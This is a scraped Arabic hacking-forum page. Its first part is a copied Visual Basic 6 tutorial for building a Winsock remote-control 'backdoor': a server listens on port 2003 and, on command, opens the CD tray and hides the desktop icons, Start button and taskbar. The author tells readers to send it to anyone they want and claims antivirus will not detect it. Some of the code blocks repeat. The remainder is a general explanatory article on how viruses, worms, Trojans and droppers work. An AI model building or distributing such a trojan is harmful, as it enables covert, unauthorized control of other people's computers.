Case &quot;hideTASKBAR&quot; ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي <br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_HIDEWINDOW) <br />
Case &quot;showTASKBAR&quot; ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي <br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_SHOWWINDOW) <br />
End Select <br />
<br />
End Sub <br />
<br />
-------------------------- <br />
--------------------------- <br />
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون <br />
--------------------------------------------- <br />
---------------------------------------------- <br />
الحين انشئ موديل واكتب هذا الكود فيها <br />
<br />
' API CALLS <br />
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم <br />
<br />
Public Declare Function mciSendString Lib &quot;winmm.dll&quot; Alias &quot;mciSendStringA&quot; (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long <br />
Public Declare Function ShowWindow Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long <br />
Public Declare Function FindWindow Lib &quot;user32&quot; Alias &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As String) As Long <br />
Public Declare Function FindWindowEx Lib &quot;user32&quot; Alias &quot;FindWindowExA&quot; (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long <br />
Public Declare Function SetWindowPos Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long <br />
<br />
Public Const SW_HIDE = 0 <br />
Public Const SW_SHOW = 5 <br />
<br />
Const SWP_HIDEWINDOW = &amp;H80 <br />
Const SWP_SHOWWINDOW = &amp;H40 <br />
'دالة اخفاء زر ابدأ <br />
Sub HideStartButton() <br />
Dim Handle As Long, FindClass As Long <br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;) <br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString) <br />
ShowWindow Handle&amp;, 0 <br />
End Sub <br />
' دالة اظهار زر ابدأ <br />
Sub ShowStartButton() <br />
Dim Handle As Long, FindClass As Long <br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;) <br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString) <br />
ShowWindow Handle&amp;, 1 <br />
End Sub <br />
<br />
'دالة اغلاق سواقة الليزر <br />
Sub CDClose() <br />
retvalue = mciSendString(&quot;set CDAudio door closed&quot;, returnstring, 127, 0) <br />
End Sub <br />
<br />
'دالة فتح سواقة الليزر <br />
Sub CDOpen() <br />
retvalue = mciSendString(&quot;set CDAudio door open&quot;, returnstring, 127, 0) <br />
End Sub <br />
----------------------------------- <br />
----------------------------------- <br />
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه <br />
والبرنامج الي عندك راح تتحكم فيه <br />
<br />
منقولللأخhi_hacker <br />
ارجوا عدم استخدامه ضد المسلمين<br />
<br />
<br />
<br />
الجزئ الثالث <br />
<br />
<br />
---------------------------------------------------------- <br />
انشئ زر واسمه فتح سواقه الليزر <br />
واكتب هذا الكود <br />
Private Sub Command3_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;openCD&quot; <br />
End Sub <br />
--------------------------------------- <br />
--------------------------------------- <br />
انشئ زر واسمه اغلاق سواقه الليزر <br />
واكتب هذا الكود <br />
Private Sub Command4_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;closeCD&quot; <br />
End Sub <br />
---------------------------------------- <br />
---------------------------------------- <br />
انشئ زر واسمه اخفاء <br />
ايقونات سطح المكتب <br />
واكتب هذا الكود <br />
Private Sub Command5_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideDESKTOP&quot; <br />
End Sub <br />
------------------------------------- <br />
-------------------------------------- <br />
انشئ زر واسمه اضهار ايقونات سطح المكتب <br />
واكتب هذا الكود <br />
Private Sub Command6_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showDESKTOP&quot; <br />
End Sub <br />
-------------------------------------------- <br />
-------------------------------------------- <br />
انشئ زر واسمه اخفاء زر ابداء <br />
واكتب هذا الكود <br />
Private Sub Command8_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideSTART&quot; <br />
End Sub <br />
-------------------------------------------- <br />
-------------------------------------------- <br />
انشئ زر واسمه اضهار زر ابداء <br />
واكتب هذا الامر <br />
Private Sub Command9_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showSTART&quot; <br />
End Sub <br />
------------------------------------------ <br />
----------------------------------------- <br />
انشئ زر واسمه اخفاء شريط المهام <br />
واكتب هذا الكود <br />
Private Sub Command10_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;hideTASKBAR&quot; <br />
End Sub <br />
----------------------------------------------- <br />
----------------------------------------------- <br />
انشئ زر واسمه اضهار شريط المهام <br />
واكتب هذا الكود <br />
Private Sub Command11_Click() <br />
On Error Resume Next <br />
wskclient.SendData &quot;showTASKBAR&quot; <br />
End Sub <br />
---------------------------------------------- <br />
<br />
الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك <br />
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال <br />
--------------------------------------------------------------------- <br />
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram <br />
اوكتب هذا الكود فيه <br />
Private Sub Timer1_Timer() <br />
If wskclient.State = 0 Then status.Caption = &quot;لايوجد إتصال&quot; <br />
If wskclient.State = 6 Then status.Caption = &quot;جاري الإتصال&quot; <br />
If wskclient.State = 7 Then status.Caption = &quot;تم الإتصال مع الخادم&quot; <br />
If wskclient.State = 8 Then status.Caption = &quot;قام الخادم بقطع الإتصال&quot; <br />
If wskclient.State = 9 Then status.Caption = &quot;خطأ في الإتصال&quot; <br />
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم <br />
If wskclient.State &lt;&gt; sckConnected Then <br />
status.Caption = &quot;لايوجد إتصال&quot; <br />
End If <br />
End Sub <br />
------------------------------- <br />
------------------------------ <br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي <br />
---------------------------------- <br />
---------------------------------- <br />
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه <br />
ip <br />
----------------------------- <br />
----------------------------- <br />
الحين انشئ text box وضعها امام label الذي سميناه ip <br />
------------------------------ <br />
----------------------------- <br />
الحين انشئ label وسمه port <br />
------------------------------------- <br />
الحين انشئ text box وضعها امام label الي سميناه port <br />
-------------------------------------- <br />
الحين انشئ label واتركه فارغا وضعه اسفل الفورم <br />
------------------------------------------------------------------ <br />
------------------------------------------------------------------ <br />
------------------------------------------------------------------ <br />
الحين نكتب برنامج الخادم <br />
انشئ فورم جديد واكتب هذا الكود فيه <br />
Private Sub Form_Load() <br />
'wskServer اسم اداة الوينسوكت في هذا البرنامج <br />
wskServer.LocalPort = 2003 <br />
' تعيين منفذ للخادم <br />
wskServer.Listen <br />
' بدء تشغيل الخادم <br />
TaskBarHwnd = FindWindow(&quot;Shell_traywnd&quot;, &quot;&quot;) <br />
' يقوم البرنامج بتحديد تعريف شريط المهام <br />
End Sub <br />
--------------------------------------- <br />
--------------------------------------- <br />
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub <br />
Private Sub wskServer_ConnectionRequest(By<br />
Val requestID As Long) <br />
If wskServer.State &lt;&gt; sckClosed Then _ <br />
wskServer.Close <br />
wskServer.Accept requestID <br />
' قبول طلب الاتصال <br />
End Sub <br />
<br />
'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ==== <br />
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long) <br />
Dim command As String <br />
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل <br />
wskServer.GetData command <br />
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل <br />
<br />
Select Case command ' تحديد الأمر القادم من البرنامج العميل <br />
Case &quot;openCD&quot; ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي <br />
CDOpen <br />
Case &quot;closeCD&quot; <br />
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي <br />
Case &quot;hideDESKTOP&quot; ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي <br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString) <br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString) <br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString) <br />
Call ShowWindow(SysListView&amp;, SW_HIDE) <br />
Case &quot;showDESKTOP&quot; ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي <br />
Progman&amp; = FindWindow(&quot;Progman&quot;, vbNullString) <br />
SHELLDLLDefView&amp; = FindWindowEx(Progman&amp;, 0&amp;, &quot;SHELLDLL_DefView&quot;, vbNullString) <br />
SysListView&amp; = FindWindowEx(SHELLDLLDefView&amp;, 0&amp;, &quot;SysListView32&quot;, vbNullString) <br />
Call ShowWindow(SysListView&amp;, SW_SHOW) <br />
Case &quot;hideSTART&quot; ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي <br />
HideStartButton <br />
Case &quot;showSTART&quot; ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي <br />
ShowStartButton <br />
Case &quot;hideTASKBAR&quot; ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي <br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_HIDEWINDOW) <br />
Case &quot;showTASKBAR&quot; ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي <br />
Call SetWindowPos(TaskBarHwnd, 0&amp;, 0&amp;, 0&amp;, 0&amp;, 0&amp;, SWP_SHOWWINDOW) <br />
End Select <br />
<br />
End Sub <br />
<br />
-------------------------- <br />
--------------------------- <br />
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون <br />
--------------------------------------------- <br />
---------------------------------------------- <br />
الحين انشئ موديل واكتب هذا الكود فيها <br />
<br />
' API CALLS <br />
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم <br />
<br />
Public Declare Function mciSendString Lib &quot;winmm.dll&quot; Alias &quot;mciSendStringA&quot; (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long <br />
Public Declare Function ShowWindow Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long <br />
Public Declare Function FindWindow Lib &quot;user32&quot; Alias &quot;FindWindowA&quot; (ByVal lpClassName As String, ByVal lpWindowName As String) As Long <br />
Public Declare Function FindWindowEx Lib &quot;user32&quot; Alias &quot;FindWindowExA&quot; (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long <br />
Public Declare Function SetWindowPos Lib &quot;user32&quot; (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long <br />
<br />
Public Const SW_HIDE = 0 <br />
Public Const SW_SHOW = 5 <br />
<br />
Const SWP_HIDEWINDOW = &amp;H80 <br />
Const SWP_SHOWWINDOW = &amp;H40 <br />
'دالة اخفاء زر ابدأ <br />
Sub HideStartButton() <br />
Dim Handle As Long, FindClass As Long <br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;) <br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString) <br />
ShowWindow Handle&amp;, 0 <br />
End Sub <br />
' دالة اظهار زر ابدأ <br />
Sub ShowStartButton() <br />
Dim Handle As Long, FindClass As Long <br />
FindClass&amp; = FindWindow(&quot;Shell_TrayWnd&quot;, &quot;&quot;) <br />
Handle&amp; = FindWindowEx(FindClass&amp;, 0, &quot;Button&quot;, vbNullString) <br />
ShowWindow Handle&amp;, 1 <br />
End Sub <br />
<br />
'دالة اغلاق سواقة الليزر <br />
Sub CDClose() <br />
retvalue = mciSendString(&quot;set CDAudio door closed&quot;, returnstring, 127, 0) <br />
End Sub <br />
<br />
'دالة فتح سواقة الليزر <br />
Sub CDOpen() <br />
retvalue = mciSendString(&quot;set CDAudio door open&quot;, returnstring, 127, 0) <br />
End Sub <br />
----------------------------------- <br />
----------------------------------- <br />
الحين سلامتك البرنامج الباكدور الي سويناه دزه لاي سخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه <br />
والبرنامج الي عندك راح تتحكم فيه <br />
<br />
<br />
<br />
منقوووووول للفــــائدة</div>[/FRAME][/FRAME]</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29462</guid>
		</item>
		<item>
			<title>كيف تعمل الفيروسات</title>
			<link>https://kwety.net/vb/showthread.php?t=29350&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 22:53:06 GMT</pubDate>
			<description><![CDATA[كيف تعمل الفيروسات

الكاتب: غير معروف

 
الخطوة الأولى في مكافحة فيروسات الكمبيوتر، هي فهم أنواعها وآليات عملها

تتضمن معظم الكمبيوترات الشخصية المباعة حديثاً برامج لمكافحة الفيروسات، وهذه الحقيقة، أكثر من أي شيء آخر، تدلنا على مدى انتشار الفيروسات، ومدى قبول صناعة الكمبيوتر بها، كقدر لا مفر منه! لقد أصبحت الفيروسات أمراً واقعاً في عالم الكمبيوتر اليوم.

يوجد حالياً الآلاف من فيروسات الكمبيوتر، ويمكن تصنيفها إلى عدة فئات، لكنها جميعاً، على العموم، تخضع لتعريف مشترك بسيط: الفيروس هو برنامج كمبيوتر مصمم عمداً ليقترن ببرنامج آخر، بحيث يعمل الفيروس عندما يعمل ذلك البرنامج، ومن ثمَّ يعيد إنتاج نفسه باقترانه ببرامج أخرى. ويقترن الفيروس بالبرنامج الأصلي بإلصاق نفسه به، أو باستبداله أحياناً، وقد يغير الفيروس نفسه عند إعادة الإنتاج، فيظهر كنسخة معدلة عن النسخة التي قبلها، كلما كرر العملية. ويمكن أن تتلوث برامج الماكرو بالفيروس، أو قطاع الإقلاع (boot sector) على القرص، وهو أول برنامج يتم تحميله من قرص يحمل ملفات إقلاع نظام التشغيل.

لاحظ عبارة "مصمم عمداً" في التعريف، فالفيروسات لا تظهر صدفة، بل يكتبها مبرمجون ذوو مهارات عالية عادة، ثم يجدون طريقة لنشرها في أجهزة المستخدمين الغافلين عنها. وكلما أصبحت برامج مكافحة الفيروسات أقوى، زاد المبرمجون من جهودهم لتطوير فيروسات أذكى، للتحايل عليها. والهدف من تطوير الفيروسات، بالنسبة للكثير من مؤلفيها، ليس أكثر من تحد، والرغبة في إثبات تفوقهم، بينما هو للبعض الآخر التلذذ بإثارة حيرة الآخرين وشكوكهم في الكمبيوتر، أو إزعاجهم، وحتى إيذائهم! وهذا أمر سيئ جداً، إذ يمكنهم أن يجنوا أموالاً طائلة، إذا وجهوا مواهبهم لمساعدة الشركات على حل مشكلة العام 2000، بدلاً من هدرها في أعمال لا طائل منها، مثل تطوير الفيروسات.

اشتهرت فيروسات الكمبيوتر بقدرتها على الأذى وإحداث الأضرار، لكن في الحقيقة، فإن الكثير منها غير مؤذ. صحيح أن بعضها يحذف الملفات، أو يقوم بأعمال تخريبية أخرى، لكن معظمها يسبب إزعاجاً بسيطاً فقط، وبعضها لا يلحظه المستخدم العادي أبداً. ويكفي أن يتمكن البرنامج من إعادة إنتاج نفسه حتى يعتبر فيروساً، بغض النظر عن الأعمال التي ينفذها.

لكن، في الحقيقة، حتى الفيروسات غير المؤذية، تسبب بعض الأذى! فهي تستهلك مساحات تخزين على القرص، وجزءاً من ذاكرة الكمبيوتر، وتشغل جزءاً من طاقة المعالج، وبالتالي فهي تؤثر على سرعة وكفاءة الجهاز. أضف إلى ذلك، أن برامج كشف الفيروسات وإزالتها، تستهلك أيضاً موارد الجهاز. ويرى الكثير من المستخدمين، أن برامج مكافحة الفيروسات تبطئ عمل الجهاز بشكل ملحوظ، وهي أكثر تطفلاً عليه من الفيروسات ذاتها! وبعبارة أخرى، تؤثر الفيروسات في عالم الكمبيوتر، حتى إذا لم تكن تفعل شيئاً.


الفيروسات وأشباه الفيروسات

إن الشرح المذكور في الفقرة السابقة عن الفيروس، أكثر تحديداً من الطريقة التي نستخدم فيها كلمة "فيروس" في الواقع. وتوجد أنواع أخرى من البرامج، ينطبق عليها تعريف الفيروس جزئياً. تشترك هذه الأنواع مع الفيروسات في أنها تعمل بدون علم المستخدم، وتقوم بأعمال ضمن الكمبيوتر، مصممة عمداً لتنفيذها. ومن هذه الأنواع: الديدان (worms)، وأحصنة طروادة (Trojan horses)، وبرامج الإنزال (droppers). وتعتبر كل هذه البرامج، بما فيها الفيروسات، جزءاً من فئة أكبر تدعى البرامج الماكرة (malware)، وهي مشتقة من عبارة malicious-logic software.

والدودة برنامج يعيد إنتاج نفسه، لكنها لا تلوث برامج أخرى. تنسخ الدودة نفسها من وإلى الأقراص المرنة، أو عبر الشبكات، ويعتمد بعضها على الشبكة في إنجاز عملها. تستخدم إحدى أنواع الديدان -وهي الدودة المضيفة (host worm)- الشبكة لنسخ نفسها، فقط، إلى أجهزة الكمبيوتر المتصلة بالشبكة. بينما توزع الدودة الشبكية (network worm) أجزاءها على عدة كمبيوترات، وتعتمد على الشبكة فيما بعد لتشغيل هذه الأجزاء. ويمكن أن تظهر الديدان على كمبيوترات منفصلة، فتنسخ نفسها إلى أماكن متعددة على القرص الصلب.

وسمي النوع الثاني من البرمجيات الماكرة "حصان طروادة"، نسبة للأسطورة الإغريقية الواردة في ملحمة الأوديسا لهوميروس، حيث ترك الجيش الإغريقي حصاناً خشبياً ضخماً، كهدية لسكان طروادة، وكان يختبئ ضمنه مجموعة من الجنود الأشداء، بعد أن تظاهروا بإنهاء الحصار الطويل، وعندما رحل الجيش وأدخل السكان الحصان إلى داخل أسوار المدينة، خرج الجند منه وانقضوا على الحامية، وسقطت المدينة في أيدي الإغريق. وتعتمد برامج أحصنة طروادة على المبدأ ذاته، فهي تختبئ ضمن برامج يبدو مظهرها بريئاً، وعندما يشغّل المستخدم واحداً من هذه البرامج، ينشط الجزء الماكر ويقوم بعمل معين مصمم له. وتختلف أحصنة طروادة عن الفيروسات العادية، في أنها لا تعيد إنتاج نفسها.

وصممت برامج الإنزال (droppers) لمراوغة برامج مكافحة الفيروسات، وتعتمد على التشفير غالباً لمنع اكتشافها. ووظيفة هذه البرامج عادة، نقل وتركيب الفيروسات، فهي تنتظر لحظة حدوث أمر معين على الكمبيوتر، لكي تنطلق وتلوثه بالفيروس المحمول في طياتها.

وينتمي مفهوم قنبلة (bomb) الكمبيوتر إلى هذه الفئة، إذ تبنى القنابل ضمن البرمجيات الماكرة كواسطة لتنشيطها. وتبرمج القنابل لتنشط عند حدوث حدث معين. تنشط بعض القنابل في وقت محدد، اعتماداً على ساعة الكمبيوتر. فيمكن برمجة قنبلة مثلاً، لمسح كافة الملفات ذات الامتداد .DOC من قرصك الصلب، عشية رأس السنة الميلادية، أو لعرض رسالة على الشاشة، في اليوم المصادف لعيد ميلاد شخصية مشهورة. وتعمل بعض القنابل تحت شروط أو أحداث أخرى، فيمكن أن تنتظر القنبلة إلى أن يتم تشغيل برنامج معين، عشرين مرة مثلاً، وعندها تمسح ملفات القوالب (templates) الخاصة بهذا البرنامج. ومن وجهة النظر هذه، تعتبر القنابل مجرد برامج جدولة زمنية ماكرة.

ويمكننا النظر إلى الفيروسات كحالات خاصة من البرمجيات الماكرة، إذ يمكن للفيروسات الانتشار بواسطة برامج الإنزال (ولا يشترط ذلك)، وهي تستخدم مفهوم برامج الديدان لإعادة إنتاج نفسها. ولا تعتبر الفيروسات مماثلة لأحصنة طروادة من الناحية التقنية، إلا أنها تشابهها في نقطتين: فهي تنفذ أعمالاً لا يريدها المستخدم، وتحول البرنامج الذي تلتصق به إلى حصان طروادة عملياً (تختبئ داخله، وتعمل عندما يعمل البرنامج، وتنفذ أعمالاً غير مرغوبة).


كيف يعمل الفيروس؟

تعمل الفيروسات بطرق مختلفة، وسنعرض فيما يلي للطريقة العامة التي تنتهجها كافة الفيروسات. في البداية يظهر الكمبيوتر على جهازك، ويكون قد دخل إليه مختبئاً في ملف برنامج ملوث (مثل ملفات COM أو EXE أو قطاع الإقلاع). وكانت الفيروسات في الماضي تنتشر بشكل أساسي عن طريق توزيع أقراص مرنة ملوثة. أما اليوم، فمعظمها يأتي مع البرامج المنقولة عبر الشبكات (ومن بينها إنترنت)، كجزء من برنامج تركيب نسخة تجريبية من تطبيق معين، أو ماكرو لأحد التطبيقات الشهيرة، أو كملف مرفق (attachment) برسالة بريد إلكتروني.

ويجدر التنويه إلى أن رسالة البريد الإلكتروني نفسها لا يمكن أن تكون فيروساً، فالفيروس برنامج، ويجب تشغيله لكي يصبح نشطاً. إذاً الفيروس المرفق برسالة بريد إلكتروني، لا حول له ولا قوة، إلى أن تشغّله. ويتم تشغيل فيروسات المرفقات عادة، بالنقر عليها نقرة مزدوجة بالماوس. ويمكنك حماية جهازك من هذه الفيروسات، بالامتناع عن تشغيل أي ملف مرفق برسالة بريد إلكتروني، إذا كان امتداده COM أو EXE، أو إذا كان أحد ملفات بيانات التطبيقات التي تدعم الماكرو، مثل برامج أوفيس، إلى ما بعد فحصه والتأكد من خلوه من الفيروسات. أما ملفات الرسوميات والصوت، وأنواع ملفات البيانات الأخرى القادمة كمرفقات، فهي آمنة، ولا يمكن للفيروس أن ينشط من خلالها، ولذلك فهو لا يهاجمها.

إذاً يبدأ الفيروس دورة حياته على الجهاز بشكل مشابه لبرنامج حصان طروادة، فهو يختبئ في ثنايا برنامج أو ملف آخر، وينشط معه. في الملفات التنفيذية الملوثة، يكون الفيروس قد أضاف شيفرته إلى البرنامج الأصلي، وعدل تعليماته بحيث ينتقل التنفيذ إلى شيفرة الفيروس. وعند تشغيل الملف التنفيذي المصاب، يقفز البرنامج عادة إلى تعليمات الفيروس، فينفذها، ثم يعود ثانية لتنفيذ تعليمات البرنامج الأصلي. وعند هذه النقطة يكون الفيروس ناشطاً، وجهازك أصبح ملوثاً.

وقد ينفذ الفيروس مهمته فور تنشيطه (ويطلق عليه فيروس العمل المباشر direct-action)، أو يقبع منتظراً في الذاكرة، باستخدام وظيفة "الإنهاء والبقاء في الذاكرة" (terminate and stay resident, TSR)، التي تؤمنها نظم التشغيل عادة. وتنتمي غالبية الفيروسات لهذه الفئة، ويطلق عليها الفيروسات "المقيمة". ونظراً للإمكانيات الكبيرة المتاحة للبرامج المقيمة في الذاكرة، بدءاً من تشغيل التطبيقات والنسخ الاحتياطي للملفات إلى مراقبة ضغطات لوحة المفاتيح ونقرات الماوس (والكثير من الأعمال الأخرى)، فيمكن برمجة الفيروس المقيم، لتنفيذ أي عمل يمكن أن يقوم به نظام التشغيل، تقريباً. يمكن تشغيل الفيروس المقيم كقنبلة، فيبدأ مهمته على جهازك عند حدث معين. ومن الأمور التي تستطيع الفيروسات المقيمة عملها، مسح (scan) قرصك الصلب وأقراص الشبكة بحثاً عن الملفات التنفيذية، ثم نسخ نفسها إلى هذه الملفات وتلويثها.


أنواع الفيروسات

يبحث مطورو الفيروسات، بشكل دائم، عن طرق جديدة لتلويث كمبيوترك، لكن أنواع الفيروسات معدودة عملياً، وتصنف إلى: فيروسات قطاع الإقلاع (boot sector viruses)، وملوثات الملفات (file infectors)، وفيروسات الماكرو (macro viruses). وتوجد أسماء أخرى لهذه الفئات، وبعض الفئات المتفرعة عنها، لكن مفهومها يبقى واحداً.

تقبع فيروسات قطاع الإقلاع في أماكن معينة على القرص الصلب ضمن جهازك، وهي الأماكن التي يقرأها الكمبيوتر وينفذ التعليمات المخزنة ضمنها، عند الإقلاع. تصيب فيروسات قطاع الإقلاع الحقيقية منطقة قطاع الإقلاع الخاصة بنظام دوس (DOS boot record)، بينما تصيب فيروسات الفئة الفرعية المسماة MBR viruses، قطاع الإقلاع الرئيسي للكمبيوتر (master boot record). يقرأ الكمبيوتر كلا المنطقتين السابقتين من القرص الصلب عند الإقلاع، مما يؤدي إلى تحميل الفيروس في الذاكرة. يمكن للفيروسات أن تصيب قطاع الإقلاع على الأقراص المرنة، لكن الأقراص المرنة النظيفة، والمحمية من الكتابة، تبقى أكثر الطرق أمناً لإقلاع النظام، في حالات الطوارئ. والمشكلة التي يواجهها المستخدم بالطبع، هي كيفية التأكد من نظافة القرص المرن، أي خلوه من الفيروسات، قبل استخدامه في الإقلاع، وهذا ما تحاول أن تفعله برامج مكافحة الفيروسات.

تلصق ملوثات الملفات (وتدعى أيضاً الفيروسات الطفيلية parasitic viruses) نفسها بالملفات التنفيذية، وهي أكثر أنواع الفيروسات شيوعاً. وعندما يعمل أحد البرامج الملوثة، فإن هذا الفيروس، عادة، ينتظر في الذاكرة إلى أن يشغّل المستخدم برنامجاً آخر، فيسرع عندها إلى تلويثه. وهكذا، يعيد هذا النوع من الفيروس إنتاج نفسه، ببساطة، من خلال استخدام الكمبيوتر بفعالية، أي بتشغيل البرامج! وتوجد أنواع مختلفة من ملوثات الملفات، لكن مبدأ عملها واحد.

تعتمد فيروسات الماكرو (macro viruses)، وهي من الأنواع الحديثة نسبياً، على حقيقة أن الكثير من التطبيقات تتضمن لغات برمجة مبيتة ضمنها. وقد صممت لغات البرمجة هذه لمساعدة المستخدم على أتمتة العمليات المتكررة التي يجريها ضمن التطبيق، من خلال السماح له بإنشاء برامج صغيرة تدعى برامج الماكرو. تتضمن برامج طاقم أوفيس، مثلاً، لغة برمجة مبيتة، بالإضافة إلى العديد من برامج الماكرو المبيتة أيضاً، والجاهزة للاستخدام المباشر. وفيروس الماكرو ببساطة، هو برنامج ماكرو مصمم للعمل مع تطبيق معين، أو عدة تطبيقات تشترك بلغة برمجة واحدة. أصبحت فيروسات الماكرو شهيرة بفضل الفيروس المصمم لبرنامج مايكروسوفت وورد. فعندما تفتح وثيقة أو قالباً ملوثين، ينشط الفيروس ويؤدي مهمته التخريبية. وقد بُرمِج هذا الفيروس لينسخ نفسه إلى ملفات الوثائق الأخرى، مما يؤدي إلى ازدياد انتشاره مع استمرار استخدام البرنامج.

ويجمع نوع رابع يدعى الفيروس "متعدد الأجزاء" (multipartite) بين تلويث قطاع الإقلاع مع تلويث الملفات، في وقت واحد.

ستجد قائمة ضخمة بأسماء الفيروسات، مع شرح تفصيلي عن آثار كل منها، في قسم Virus Encyclopedia من موقع مختبر مكافحة الفيروسات، الخاص بشركة سيمانتك، على العنوان:

http://www.symantec.com/avcenter/vinfodb.html


ذكاء الفيروسات في ازدياد

نجح مبدأ فيروس الماكرو، لأن لغات البرمجة أمنت إمكانية الوصول إلى الذاكرة والأقراص الصلبة. وهذا ما أمنته التقنيات الحديثة أيضاً، بما فيها عناصر تحكم ActiveX، وبريمجات جافا (Java applets). صحيح أن هذه التقنيات صُممت مع ضمان حماية القرص الصلب من برامج الفيروسات (تعد جافا أفضل من ActiveX في هذا المجال)، لكن الحقيقة أن هذه البرامج تستطيع تركيب نفسها على جهازك بمجرد زيارتك لموقع ويب. ومن الواضح أن أجهزتنا ستكون أكثر عرضة لمخاطر الفيروسات والبرمجيات الماكرة الأخرى، مع ازدياد تشبيك الكمبيوترات ببعضها، وبشبكة إنترنت، خصوصاً مع المزايا التي تعدنا بها إنترنت لإجراء ترقية نظم التشغيل عبرها (يؤمن نظاما ويندوز98 وويندوز2000 هذه الإمكانيات).

إن أقل ما يوصف به مطورو الفيروسات، هو مهارتهم وقدرتهم الفذة على الابتكار، فهم يخرجون إلينا دائماً بطرق جديدة لخداع برامج مكافحة الفيروسات. فمثلاً، تضلل الفيروسات المتسللة (stealth viruses) الجديدة، برامج مكافحة الفيروسات، بإيهامها أن الأمور تسير على ما يرام، ولا يوجد أي مؤشر على وجود فيروس. كيف؟

يعتمد مبدأ عمل الفيروس المتسلل، على الاحتفاظ بمعلومات عن الملفات التي لوثها، ثم الانتظار في الذاكرة، ومقاطعة عمل برامج مكافحة الفيروسات خلال بحثها عن الملفات المعدلة، وإعطائها المعلومات القديمة التي يحتفظ بها عن هذه الملفات، بدلاً من السماح لها بالحصول على المعلومات الحقيقية من نظام التشغيل!

أما الفيروسات متغيرة الشكل (polymorphic viruses)، فتعدل نفسها أثناء إعادة الإنتاج، مما يجعل من الصعب على برامج مكافحة الفيروسات التي تبحث عن نماذج معينة من مثل هذا الفيروس، اكتشاف كافة أشكاله الموجودة، وبالتالي تستطيع الفيروسات الناجية، الاستمرار وإعادة إنتاج أشكال جديدة.

